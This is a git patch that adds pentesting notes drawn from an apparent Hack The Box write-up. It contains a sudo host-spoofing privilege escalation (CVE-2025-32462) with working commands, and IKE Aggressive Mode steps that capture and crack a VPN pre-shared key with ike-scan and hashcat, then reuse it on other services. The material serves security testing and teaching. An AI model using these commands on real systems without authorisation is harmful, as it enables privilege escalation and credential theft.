From db55d29ba0fc6aee386c962b07dc3b85438c47c8 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 7 Mar 2026 18:36:54 +0000 Subject: [PATCH] Add content from: HTB: Expressway --- .../privilege-escalation/README.md | 26 +++++++++++++++++++ .../ipsec-ike-vpn-pentesting.md | 21 ++++++++++++++- 2 files changed, 46 insertions(+), 1 deletion(-) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 7fd019a3c4c..bee3c0968b8 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -100,6 +100,31 @@ Here is a [PoC](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot) to exploit th For more information, refer to the original [vulnerability advisory](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/) +### Sudo host-based rules bypass (CVE-2025-32462) + +Sudo before 1.9.17p1 (reported affected range: **1.8.8–1.9.17**) can evaluate host-based sudoers rules using the **user-supplied hostname** from `sudo -h ` instead of the **real hostname**. If sudoers grants broader privileges on another host, you can **spoof** that host locally. + +Requirements: +- Vulnerable sudo version +- Host-specific sudoers rules (host is neither the current hostname nor `ALL`) + +Example sudoers pattern: + +``` +Host_Alias SERVERS = devbox, prodbox +Host_Alias PROD = prodbox +alice SERVERS, !PROD = NOPASSWD:ALL +``` + +Exploit by spoofing the allowed host: + +```bash +sudo -h devbox id +sudo -h devbox -i +``` + +If resolution of the spoofed name blocks, add it to `/etc/hosts` or use a hostname that already appears in logs/configs to avoid DNS lookups. + #### sudo < v1.8.28 From @sickrov @@ -2157,5 +2182,6 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md - [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html) - [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html) - [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/) +- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 250ea145dc9..0cbd3155c64 100644 --- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -215,6 +215,24 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library ![](<../images/image (891).png>) +### Aggressive Mode identity leakage + +Aggressive Mode must send the **ID** early so the gateway can pick the right PSK when **multiple groups/users** exist. This means the **identity is exposed pre-auth**, unlike Main Mode where it is encrypted in later packets. You can extract it quickly: + +```bash +ike-scan -A +# Look for: ID(Type=ID_USER_FQDN, Value=ike@corp.tld) +``` + +If Aggressive Mode is enabled, capture a crackable PSK handshake and crack it offline (hashcat mode `5400`): + +```bash +ike-scan -A --pskcrack=handshake.txt +hashcat -m 5400 handshake.txt /path/to/wordlist.txt +``` + +Recovered PSKs are often **reused** as credentials for other services (SSH, VPN client auth), so test them against exposed services. + ## Capturing & cracking the hash Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash: @@ -326,5 +344,6 @@ Practical tips ## References - [YIKES: WatchGuard Fireware OS IKEv2 out-of-bounds write (CVE-2025-9242)](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/) +- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html) -{{#include ../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../banners/hacktricks-training.md}}